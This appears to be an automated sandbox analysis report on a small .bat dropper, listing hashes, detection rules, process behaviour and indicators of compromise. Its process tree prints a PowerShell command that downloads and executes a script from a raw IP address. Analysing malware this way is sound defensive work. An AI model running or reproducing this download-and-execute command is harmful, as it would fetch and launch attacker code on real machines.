b90e099ce246bbb92781c5426491b3def2122660c546f5ab93aca4a0baeb1edd

Analysis

Target

06b926501124d92a036344bf241649d7.bat
Size

220B
MD5

1f1b4ef469c59f64bc350fa3049fb232
SHA1

3415fe4896d99fe99f439347fdb4aa3fc2ce9358
SHA256

b90e099ce246bbb92781c5426491b3def2122660c546f5ab93aca4a0baeb1edd
SHA512

93cf23a75fd96010e5ce84107ab0a86013775aa6392c1218611b7538c9abf2700a13998325993cc3ae1c95d23a680df37b70cc2b245c04fd5aa14bf185696399

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/06b926501124d92a036344bf241649d7

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

WerFault.exe

ServiceHost packer 6 IoCs

Detects ServiceHost packer used for .NET malware

Processes:

resource	yara_rule
behavioral2/memory/576-2-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/576-3-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/576-4-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/576-5-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/576-6-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/576-7-0x0000000000000000-mapping.dmp	servicehost

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 60 wrote to memory of 576	60	cmd.exe	powershell.exe
PID 60 wrote to memory of 576	60	cmd.exe	powershell.exe
PID 60 wrote to memory of 576	60	cmd.exe	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

608 576 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 608 WerFault.exe
Token: SeBackupPrivilege 608 WerFault.exe
Token: SeDebugPrivilege 608 WerFault.exe

pid	pid_target	process	target process
608	576	WerFault.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\06b926501124d92a036344bf241649d7.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:60

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/06b926501124d92a036344bf241649d7');Invoke-HIUNLHOBGPFML;Start-Sleep -s 10000"
2⤵
PID:576

memory/576-0-0x0000000000000000-mapping.dmp

Download
memory/576-2-0x0000000000000000-mapping.dmp

Download
memory/576-3-0x0000000000000000-mapping.dmp

Download
memory/576-4-0x0000000000000000-mapping.dmp

Download
memory/576-5-0x0000000000000000-mapping.dmp

Download
memory/576-6-0x0000000000000000-mapping.dmp

Download
memory/576-7-0x0000000000000000-mapping.dmp

Download
memory/608-1-0x0000000004740000-0x0000000004741000-memory.dmp

Filesize
4KB

Download
memory/608-8-0x0000000004E70000-0x0000000004E71000-memory.dmp

Filesize
4KB

Download